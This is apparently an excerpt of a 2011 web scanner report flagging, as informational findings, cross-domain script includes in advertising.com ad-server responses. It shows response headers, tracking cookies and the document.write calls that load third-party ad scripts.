Set-Cookie: BASE=x7Q9Wi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: ROLL=U6APKjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6DkcN!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
Set-Cookie: 43472790=_4dfa489d,2003200856,768033^1004438^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript1.1" src="http://ebay.adnxs.com/ttj?id=472679&cb=2003200856&pt1=0000768033&pt2=0001004438&pt3=1183&imp_id=v2:I:1308248221:2003200856:0000768033:0001004438:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001004438/cstr=43472790=_4dfa489d,2003200856,768033^1004438^1183^0,1_/xsxdata=$XSXDATA/bnum=43472790/optn=64?trg="><\/script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=46970102/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N5865.126262.AOLPERFORMANCENETWO/B5551575.40;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001029730/cstr=46970102=_4dfa4fe4,1115861440,768033^1029730^1183^0,1_/xsxdata=$xsxdata/bnum=46970102/optn=64?trg=;ord=1115861440?

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1029730.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:48:04 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 609
Date: Thu, 16 Jun 2011 18:48:04 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=k/k+NFJwHob0Fk6sIWwJoaAjtKPCC0nRdJpwEg02FVMBdbdRFTwihXUxEwjmGVMBxGeRFTAQvaUxEQW4FVMBLppRFTQghXUxEgN5FVMB6ijRFTAmhXUxEAY4FVMBdDmRFTA/yaUxEAVZGVMBYimRFTA3WaUxEQY4FVMBFGeRFTAxBaUxEU1aGVMBbTeRFTQwBaUxEYnXGVMBWGoRFTgQvaUxEogmGVMBxmpRFTQRgaUxE0soGVMB8mpRFHZAmZOiGhZj0jw+NXgbtiGA8Moxj7a+AcsmGPuAEOphAbLuBoKuGj/smJwokaIwzClALRqhAXaxAMdPGQwrQQwdIaQhq62ApVmxuTqHIUbNG7WtrCQIza8IwOICM/oBwB; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: F1=BQ+T63EBAAAABAAAAQBA+BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: BASE=x7Q9di23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/N!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: ROLL=U6APNjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMP!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: 46970102=_4dfa4fe4,1115861440,768033^1029730^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5865.126262.AOLPERFORMANCENETWO/B5551575.40;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001029730/cstr=46970102=_4dfa4fe4,1115861440,768033^1029730^1183^0,1_/xsxdata=$xsxdata/bnum=46970102/optn=64?trg=;ord=1115861440?">');document.write('<\/SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=63221864/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://view.atdmt.com/TLC/jview/314453502/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001004266/cstr=63221864=_4dfa4c42,7871412873,768033^1004266^1183^0,1_/xsxdata=$xsxdata/bnum=63221864/optn=64?trg=

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1004266.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:32:34 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 683
Date: Thu, 16 Jun 2011 18:32:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=Cxk+NFJwHob0Fn6sIWwJoaMjtKPCC0nBeJpwEg02FYMBdbdBGTwihXgxEwjmGYMBxGeBGTAQvagxEQW4FYMBLppBGTQghXgxEgN5FYMB6ijBGTAmhXgxEAY4FYMBdDmBGTA/yagxEAVZGYMBYimBGTA3WagxEQY4FYMBFGeBGTAxBagxEU1aGYMBbTeBGTQwBagxEYnXGYMBWGoBGTgQvagxEogmGYMBxmpBGTQRgagxE0soGYMB8mpBGHZAmZOiGkZj0jw+NXsbtiGA8Mohk7a+AcsmGSuAEOpRBbLuBoKuGm/smJwokaUwzClALRqRBXaxAMdPGTwrQQwdIachq62ApVmhvTqHIUbNG+G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: F1=BIET63EBAAAABAAAAEBAECA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: BASE=x7Q9ai23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUykM!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: ROLL=U6APOjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2C!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: 63221864=_4dfa4c42,7871412873,768033^1004266^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/314453502/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001004266/cstr=63221864=_4dfa4c42,7871412873,768033^1004266^1183^0,1_/xsxdata=$xsxdata/bnum=63221864/optn=64?trg="><\/script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=63734715/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N884.AOL-Advertising/B5043385.2;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001021113/cstr=63734715=_4dfa55fe,2103643680,768033^1021113^1183^0,1_/xsxdata=$xsxdata/bnum=63734715/optn=64?trg=;ord=2103643680?

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1021113.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 19:14:06 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 596
Date: Thu, 16 Jun 2011 19:14:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=+Xl+NFJwHob0Ff6sIWwJoasitKPCC0nBcJpwEg02FQMBdbdBETwihXAxEwjmGQMBxGeBETAQvaAxEQW4FQMBLppBETQghXAxEgN5FQMB6ijBETAmhXAxEAY4FQMBdDmBETA/yaAxEAVZGQMBYimBETA3WaAxEQY4FQMBFGeBETAxBaAxEU1aGQMBbTeBETQwBaAxEYnXGQMBWGoBETgQvaAxEogmGQMBxmpBETQRgaAxE0soGQMB8mpBEHZAmZOiGcZj0jw+NXMbtiGA8Mohi7a+AcsmGKuAEOpR/aLuBoKuGe/smJwoka0vzClALRqR/WaxAMdPGLwrQQwdIa8gq62ApVmhtTqHIUbNG2WtrCQIzaoIwOICM/oxudr0IwKvG8Gt5jwMvaAc; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:06 GMT; path=/
Set-Cookie: F1=B4fV63EBAAAABAAAAwBA0BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:06 GMT; path=/
Set-Cookie: BASE=x7Q9li23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPGnvMOKDL!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:06 GMT; path=/
Set-Cookie: ROLL=U6APVjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGAs5By7NO!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:06 GMT; path=/
Set-Cookie: 63734715=_4dfa55fe,2103643680,768033^1021113^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N884.AOL-Advertising/B5043385.2;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001021113/cstr=63734715=_4dfa55fe,2103643680,768033^1021113^1183^0,1_/xsxdata=$xsxdata/bnum=63734715/optn=64?trg=;ord=2103643680?">');document.write('<\/SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=74200963/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://view.atdmt.com/TLC/jview/242390405/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000894882/cstr=74200963=_4dfa5736,7160602726,768033^894882^1183^0,1_/xsxdata=$xsxdata/bnum=74200963/optn=64?trg=

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894882.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 19:19:18 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 677
Date: Thu, 16 Jun 2011 19:19:19 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=2cl+NFJwHob0Fe6sIWwJoaoitKPCC0nxbJpwEg02FPMBdbdxDTwihX8wEwjmGPMBxGexDTAQva8wEQW4FPMBLppxDTQghX8wEgN5FPMB6ijxDTAmhX8wEAY4FPMBdDmxDTA/ya8wEAVZGPMBYimxDTA3Wa8wEQY4FPMBFGexDTAxBa8wEU1aGPMBbTexDTQwBa8wEYnXGPMBWGoxDTgQva8wEogmGPMBxmpxDTQRga8wE0soGPMB8mpxDHZAmZOiGbZj0jw+NXActiGA8MoRi7a+AcsmGJuAEOpB/aLuBoKuGd/smJwokawvzClALRqB/WaxAMdPGKwrQQwdIa4gq62ApVmRtTqHIUbNG1WtrCQIzakIwOICM/ohudr0IwKvG7Gt5jwMva8b; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: F1=BYzV63EBAAAABAAAA0BAyBA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: BASE=x7Q9mi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPGnvMOKD70AMyNVhK!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: ROLL=U6APajemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGAs5By7NeGo6Nl6iN!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: 74200963=_4dfa5736,7160602726,768033^894882^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390405/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000894882/cstr=74200963=_4dfa5736,7160602726,768033^894882^1183^0,1_/xsxdata=$xsxdata/bnum=74200963/optn=64?trg="><\/script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=74864635/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000924216/cstr=74864635=_4dfa476a,7008281818,768033^924216^1183^0,1_/xsxdata=$xsxdata/bnum=74864635/optn=64?trg=;ord=7008281818?

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.924216.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:11:54 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 607
Date: Thu, 16 Jun 2011 18:11:54 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=qdk+NFJwHob0Fr6sIWwJoacjtKPCC0nBfJpwEg02FcMBdbdBHTwihXwxEwjmGcMBxGeBHTAQvawxEQW4FcMBLppBHTQghXwxEgN5FcMB6ijBHTAmhXwxEAY4FcMBdDmBHTA/yawxEAVZGcMBYimBHTA3WawxEQY4FcMBFGeBHTAxBawxEU1aGcMBbTeBHTQwBawxEYnXGcMBWGoBHTgQvawxEogmGcMBxmpBHTQRgawxE0soGcMB8mpBHHZAmZOiGoZj0jw+NX8btiGA8Mohl7a+AcsmGWuAEOpRCbLuBoKuGq/smJwokakwzClALRqRCXaxAMdPGXwrQQwdIash; domain=advertising.com; expires=Sat, 15-Jun-2013 18:11:54 GMT; path=/
Set-Cookie: F1=Bo2R63EBAAAABAAAAwAAMCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:11:54 GMT; path=/
Set-Cookie: BASE=x7Q9Vi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vI!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:11:54 GMT; path=/
Set-Cookie: ROLL=U6APFjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2O!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:11:54 GMT; path=/
Set-Cookie: 74864635=_4dfa476a,7008281818,768033^924216^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000924216/cstr=74864635=_4dfa476a,7008281818,768033^924216^1183^0,1_/xsxdata=$xsxdata/bnum=74864635/optn=64?trg=;ord=7008281818?">');document.write('<\/SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=75388116/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N1558.126262.AOLPERFORMANCENETWO/B5584755.2;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001029515/cstr=75388116=_4dfa511a,3065784557,768033^1029515^1183^0,1_/xsxdata=$xsxdata/bnum=75388116/optn=64?trg=;ord=3065784557?

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1029515.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:53:14 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 621
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 18:53:14 GMT
Connection: close
Set-Cookie: C2=aEl+NFJwHob0Fj6sIWwJoa8itKPCC0nBdJpwEg02FUMBdbdBFTwihXQxEwjmGUMBxGeBFTAQvaQxEQW4FUMBLppBFTQghXQxEgN5FUMB6ijBFTAmhXQxEAY4FUMBdDmBFTA/yaQxEAVZGUMBYimBFTA3WaQxEQY4FUMBFGeBFTAxBaQxEU1aGUMBbTeBFTQwBaQxEYnXGUMBWGoBFTgQvaQxEogmGUMBxmpBFTQRgaQxE0soGUMB8mpBFHZAmZOiGgZj0jw+NXcbtiGA8Mohj7a+AcsmGOuAEOpRAbLuBoKuGi/smJwokaEwzClALRqRAXaxAMdPGPwrQQwdIaMhq62ApVmhuTqHIUbNG6WtrCQIza4IwOICM/oxvdr0IwKvGAH; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:14 GMT; path=/
Set-Cookie: F1=BoRU63EBAAAABAAAAYBA8BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:14 GMT; path=/
Set-Cookie: BASE=x7Q9fi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINB!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:14 GMT; path=/
Set-Cookie: ROLL=U6APTjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0E!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:14 GMT; path=/
Set-Cookie: 75388116=_4dfa511a,3065784557,768033^1029515^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N1558.126262.AOLPERFORMANCENETWO/B5584755.2;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001029515/cstr=75388116=_4dfa511a,3065784557,768033^1029515^1183^0,1_/xsxdata=$xsxdata/bnum=75388116/optn=64?trg=;ord=3065784557?">');document.write('<\/SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=76474621/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N6751.4298.ADVERTISING.COM/B5433785;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001005068/cstr=76474621=_4dfa44f8,0221667354,768033^1005068^1183^0,1_/xsxdata=$xsxdata/bnum=76474621/optn=64?trg=;ord=0221667354?

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1005068.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:01:28 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 600
Date: Thu, 16 Jun 2011 18:01:28 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=4Tk+NFJwHob0Ft6sIWwJoakjtKPCC0nhfJpwEg02FeMBdbdhHTwihX4xEwjmGeMBxGehHTAQva4xEQW4FeMBLpphHTQghX4xEgN5FeMB6ijhHTAmhX4xEAY4FeMBdDmhHTA/ya4xEAVZGeMBYimhHTA3Wa4xEQY4FeMBFGehHTAxBa4xEU1aGeMBbTehHTQwBa4xEYnXGeMBWGohHTgQva4xEogmGeMBxmphHTQRga4xE0soGeMB8mphHHZAmZOiGqZj0jw+NXobtiGA8MoBm7a+AcsmGYuAEOpxCbLuBoKuGs/smJwokaswzClALRqxCXaxAMdPGZwrQQwdIa0h; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:28 GMT; path=/
Set-Cookie: F1=BgPR63EBAAAABAAAAkAAQCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:28 GMT; path=/
Set-Cookie: BASE=x7Q9Ti23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1wZjCzrmHH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:28 GMT; path=/
Set-Cookie: ROLL=U6APGjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:28 GMT; path=/
Set-Cookie: 76474621=_4dfa44f8,0221667354,768033^1005068^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6751.4298.ADVERTISING.COM/B5433785;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001005068/cstr=76474621=_4dfa44f8,0221667354,768033^1005068^1183^0,1_/xsxdata=$xsxdata/bnum=76474621/optn=64?trg=;ord=0221667354?">');document.write('<\/SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=83985251/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://altfarm.mediaplex.com/ad/js/14302-119028-28901-0?mpt=7117460224&mpvc=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000951514/cstr=83985251=_4dfa4d78,7117460224,768033^951514^1183^0,1_/xsxdata=$XSXDATA/bnum=83985251/optn=64?trg=

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.951514.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:37:43 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 553
Date: Thu, 16 Jun 2011 18:37:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=41k+NFJwHob0Fm6sIWwJoaIjtKPCC0nxdJpwEg02FXMBdbdxFTwihXcxEwjmGXMBxGexFTAQvacxEQW4FXMBLppxFTQghXcxEgN5FXMB6ijxFTAmhXcxEAY4FXMBdDmxFTA/yacxEAVZGXMBYimxFTA3WacxEQY4FXMBFGexFTAxBacxEU1aGXMBbTexFTQwBacxEYnXGXMBWGoxFTgQvacxEogmGXMBxmpxFTQRgacxE0soGXMB8mpxFHZAmZOiGjZj0jw+NXobtiGA8MoRk7a+AcsmGRuAEOpBBbLuBoKuGl/smJwokaQwzClALRqBBXaxAMdPGSwrQQwdIaYhq62ApVmRvTqHIUbNG9G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: F1=BgXT63EBAAAABAAAAIBACCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
